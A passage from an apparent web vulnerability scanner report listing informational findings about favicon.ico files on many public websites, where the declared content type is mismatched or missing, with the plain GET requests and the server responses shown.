User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webkinz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 29 Mar 2011 20:40:30 GMT
ETag: "588618-9f6-49fa51229eb80"
Accept-Ranges: bytes
Content-Length: 2550
_onnection: close
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:51:11 GMT
Connection: close

..............h...&......... .h.......(....... ........................................................................?*..?*.._*.U_*.._*.._*..*.U*..*..*...*.U.*...*...*...*.U.*...*...*...*.U.*...
...[SNIP]...

27.212. http://www.webring.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webring.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webring.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 09 Apr 2003 16:20:46 GMT
ETag: "2c30b21-57e-1d3c5380"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ................................vU......H......7................................r..G...B...................D...............................-...............cG...}.t$....
...[SNIP]...

27.213. http://www.wired.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wired.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wired.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 28 Feb 2007 15:09:29 GMT
ETag: "1e631-37e-42a8ac2ce5c40"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 13:50:15 GMT
Date: Sat, 02 Apr 2011 13:40:15 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

27.214. http://www.wnd.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wnd.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wnd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max_age=86400, s-maxage=2592000
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:34:08 GMT
Last-Modified: Thu, 31 Jan 2008 22:11:27 GMT
Server: ECS (dca/5329)
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cache: HIT
X-Server-Processing-Time: D=126 microseconds
X-Varnish: 819569040
Content-Length: 25214

....    .........(...............h............. .h...&... .............. ..........v... .... .........00......h....'..00..............00.... ..%...<..(....... ...................................EE..zz
...[SNIP]...

27.215. http://www.woot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.woot.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.woot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:33:10 GMT
Expires: Sat, 09 Apr 2011 13:33:11 GMT
Server: Microsoft-IIS/7.5
Via: 1.1 C aicache6
X-Powered-By: ASP.NET
Content-Length: 103
Connection: keep-alive

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

27.216. http://www.worldwinner.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.worldwinner.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worldwinner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:15 GMT
Server: Apache
Last-Modified: Wed, 18 Feb 2009 23:57:21 GMT
Accept-Ranges: bytes
Content-Length: 894
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT"
Content-Type: text/plain

..............h.......(....... ..................................................................................'..'..'..'.....7@.7@.7@.7@.... .. .. .. ........'..'..'..'.....7@.7@.7@.7@.... .. .. ..
...[SNIP]...

27.217. http://www.worthpoint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.worthpoint.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worthpoint.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: wp_session=173.193.214.243.1301751474503452; path=/; domain=.worthpoint.com
Last-Modified: Mon, 13 Apr 2009 18:38:55 GMT
ETag: "17b85c4-13e-4677406cfedc0"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ................................*?..6Q..Tr..o..#...,...3...f...@...T...>...>...f...J......................UU1....6........8c.R..<.. <....b.......0"...A..!R.B.p...B.aL`..
...[SNIP]...

27.218. http://www.wsbtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wsbtv.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wsbtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Jan 2010 20:07:02 GMT
ETag: "111f567-37e-8bfc0580"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=284
Expires: Sat, 02 Apr 2011 13:55:18 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d429400007e2b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

..............h.......(....... ................................T.`...................................J...U..U..T..D.J...............................=...O..T..T..U..U.:.........................5..
...[SNIP]...

27.219. http://www.xomba.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xomba.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xomba.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45
Date: Sat, 02 Apr 2011 13:32:32 GMT
X-Varnish: 1522720834 1522720355
Age: 111
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

The requested file favicon.ico was not found.

27.220. http://www.yfrog.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yfrog.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yfrog.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Sat, 02 Apr 2011 13:27:19 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Content-Length: 1406

..............h.......(....... .......................................iXG...f...........................................................................................................................
...[SNIP]...

27.221. http://www.yidio.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yidio.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yidio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 15 Dec 2010 01:16:38 GMT
ETag: "31b36b6-37e-49768b05b2980"
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..................................-,.%%%%&$'$&%%%%%%'$&%$(%%%)$&%&$%$&'%%/--...213&'%! ".!!#!! "" !" "#..!".!!.!"!!!!!!%%%222120###%%%"$$%%%$$$$$$!.0"5=$$$&$$'%%$$$"$$
...[SNIP]...

27.222. http://www.yourfilehost.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yourfilehost.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourfilehost.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 08 Nov 2006 00:10:36 GMT
ETag: "512a7f9-37e-25ec1700"
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..........................................................................................................................................}..C.|1.q=..}..................
...[SNIP]...

27.223. http://www.yuku.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yuku.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yuku.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Thu, 21 Oct 2010 09:05:44 GMT
ETag: "8125f0-47e-4931cd4b76a00"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=7776000
Expires: Fri, 01 Jul 2011 13:36:37 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"

............ .h.......(....... ..... ............................T..^...G...G...G...G...G...G...G...G...G...G...G...G...U....T..}...\...S...V...r...............U...I...S...S...S...Q...M...R.......S...
...[SNIP]...

27.224. http://www.zabasearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zabasearch.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zabasearch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Oct 2008 23:25:45 GMT
ETag: "805cc-57d6-d17d7040"
Accept-Ranges: bytes
Content-Length: 22486
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...f... ..............00..........v......... .h....... .... ......!..00.... ..%...2..(....... ....................................cc..UU............??...............................
...[SNIP]...

27.225. http://www.zmags.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zmags.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zmags.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 03 Nov 2010 14:17:21 GMT
ETag: "45241c9-47e-49426b314de40"
Server: Apache
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=84436
Expires: Sun, 03 Apr 2011 13:30:40 GMT
Date: Sat, 02 Apr 2011 14:03:24 GMT
Connection: close

............ .h.......(....... ..... .................................................m...c...b...n.......................................>...+...1...6...5...0.y.).b..wI..d:.>mM.......................
...[SNIP]...

28. Content type is not specified
There are 28 instances of this issue:


28.1. http://www.4shared.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=435176162; Expires=Tue, 30-Mar-2021 13:24:08 GMT; Path=/
ETag: W/"1150-1295252940000"
Last-Modified: Mon, 17 Jan 2011 08:29:00 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:24:08 GMT

............ .h.......(....... ..... ....................................................................
............................................................sT..oQ.....4...................
..
...[SNIP]...

28.2. http://www.6pm.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.6pm.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.6pm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.34
Last-Modified: Thu, 11 Nov 2010 17:23:52 GMT
Content-Length: 1150
X-UUID: e2cdfcb0-efe4-11df-9fad-001a645b7cf4
Date: Sat, 02 Apr 2011 14:06:07 GMT
Connection: close

............ .h.......(....... ..... .....@...........................>..T........................sU.."...-..........6................................................w[..#...-..........Y.......i@.....
...[SNIP]...

28.3. http://www.bizrate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizrate.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizrate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1406-1261527956000"
Last-Modified: Wed, 23 Dec 2009 00:25:56 GMT
Content-Length: 1406
Date: Sat, 02 Apr 2011 12:44:08 GMT

..............h.......(....... ................................e...P...R...]...e...f...`...l...b...p ...j......Q...Z..P...\...U...m...`...c...h...j...U...^.......d...f...\...^....^..R........^..s8..x
...[SNIP]...

28.4. http://www.blockbuster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blockbuster.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blockbuster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 30 Mar 2011 16:35:01 GMT
ETag: "c1ca9d-47e-49fb5c2169740"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:34:57 GMT
Connection: close

............ .h.......(....... ..... .....@........................j,..c%..i:..lK..X)..H..@...C...M...Y...c...i'..i(..m/......O...D......l...L...V...\...g...q...zeS..E%..-...............9...=...3...
...[SNIP]...

28.5. http://www.boldchat.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boldchat.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boldchat.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/2.1.13
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://images.boldchat.com/w3c/p3p.xml"
ETag: "AAAASDVJHbw"
Last-Modified: Thu, 23 Apr 2009 22:41:58 GMT
Content-Length: 1406
Date: Sat, 02 Apr 2011 14:19:19 GMT

..............h.......(....... ........................................N...E...............}...............f.......T...(...(.....bJ....1...........,...C...    .......{.........YE....#...&...)._J...^...
...[SNIP]...

28.6. http://www.bookrags.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bookrags.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bookrags.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 1099

<html>
<head>
<title>Request Rejected</title>
</head>
<body>We apologize for any inconvenience.<br><br>
The URL (web address) you requested returned an error in our system.<br>
Please
...[SNIP]...

28.7. http://www.chacha.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chacha.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chacha.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E96D1F42FF3550AE37BF16CECFBB552; Path=/
ETag: W/"9662-1285960496000"
Last-Modified: Fri, 01 Oct 2010 19:14:56 GMT
Content-Language: en-US
Content-Length: 9662
Date: Sat, 02 Apr 2011 12:43:27 GMT

......00.... ..%......(...0...`..... ......%.........................................E..................................................................................................................
...[SNIP]...

28.8. http://www.dailymail.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailymail.co.uk
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailymail.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"7142-1296734424000"
Last-Modified: Thu, 03 Feb 2011 12:00:24 GMT
Content-Length: 7142
Date: Sat, 02 Apr 2011 13:43:53 GMT
Connection: close

..............(...F...........h...n... .... ............... .h...~...(....... .........................................................................................................................
...[SNIP]...

28.9. http://www.dominos.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominos.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dominos.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1718-1282908538000"
Last-Modified: Fri, 27 Aug 2010 11:28:58 GMT
Content-Length: 1718
Date: Sat, 02 Apr 2011 13:53:49 GMT

..............(...&...........h...N...(....... .........................................................................................................................................wx..`....w..l...
...[SNIP]...

28.10. http://www.gap.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gap.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gap.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=21600,post-check=21600,pre-check=21600
Accept-Ranges: bytes
ETag: W/"2958-1299723520000"
Last-Modified: Thu, 10 Mar 2011 02:18:40 GMT
Content-Length: 2958
Date: Sat, 02 Apr 2011 13:31:28 GMT
Connection: close

..............................x...f...........x...............8...V...........................x...............x...............8............. .h...6......... .H....................    ..........x...f
....
...[SNIP]...

28.11. http://www.hi5.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hi5.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hi5.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"5430-1286911046000"
Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT
Content-Length: 5430
Date: Sat, 02 Apr 2011 13:34:01 GMT
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246bf123660;expires=Sat, 02-Apr-11 14:16:46 GMT;path=/

...... .... .....&......... .h.......(... ...@..... ...................................................................................................................................................
...[SNIP]...

28.12. http://www.hotwire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotwire.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2238-1300925673000"
Last-Modified: Thu, 24 Mar 2011 00:14:33 GMT
Content-Length: 2238
Date: Sat, 02 Apr 2011 13:37:49 GMT
Set-Cookie: NSC_qspe-xxx-qfstjtu=ffffffffaf131c3145525d5f4f58455e445a4a422d69;path=/;httponly

...... ..............(... ...@.......................................km..........RU......JI..)(........................................................................................................
...[SNIP]...

28.13. http://www.instructables.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
ETag: "DV9F16DWc0+"
Last-Modified: Sat, 15 Jan 2011 00:26:28 GMT
Content-Length: 894
X-Cacheable: YES - 7 days
Cache-Control: max-age=604800
Date: Sat, 02 Apr 2011 13:36:02 GMT
X-Varnish: 4054888766 4042462506
Age: 90552
Via: 1.1 varnish
X-Cache-Svr: squid02.instructables.com
X-Cache: HIT
X-Cache-Hits: 352086

..............h.......(....... .................................................................................................................................................x.....~..t..............
...[SNIP]...

28.14. http://www.jstor.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jstor.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jstor.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TENACIOUS=R2998840958; path=/
Server: AtyponWS/7.2
ETag: "7KI7zr14ieD"
Last-Modified: Fri, 25 Jun 2010 18:23:24 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 14:05:26 GMT

............ .h.......(....... ..... .................................................................................................]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..]W..................]W
...[SNIP]...

28.15. http://www.medcohealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medcohealth.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medcohealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache

<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your support ID is: 6984906241309083367</body></html>

28.16. http://www.mynewplace.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mynewplace.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mynewplace.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.1.7a
P3P: policyref="/w3c/p3p.xml", CP="CURa DEVa TAIa CONo OUR IND DSP CAO COR"
ETag: "82870KToCgf"
Last-Modified: Wed, 30 Mar 2011 18:45:34 GMT
Accept-Ranges: bytes
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:57:13 GMT
Set-Cookie: BIGipServerWEB_APPS_SE=2533425674.37663.0000; path=/
Vary: Accept-Encoding, User-Agent

............ .h.......(....... ..... ...........................................v...............................................................w...........s...e...n...V...............................
...[SNIP]...

28.17. http://www.officedepot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officedepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 3978
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 13:39:10 GMT
Date: Sat, 02 Apr 2011 13:39:10 GMT
Connection: close
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="expires" content="0">
...[SNIP]...

28.18. http://www.outbrain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outbrain.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outbrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1150-1301587216000"
Last-Modified: Thu, 31 Mar 2011 16:00:16 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:42:38 GMT

............ .h.......(....... ..... ..........................................h.+.h...h...h...h...h...h...h. .............................j...j...j..O..........E....j...j...j...................m...m
...[SNIP]...

28.19. http://www.pogo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pogo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Age: 89748
Date: Fri, 01 Apr 2011 12:39:29 GMT
Connection: Keep-Alive
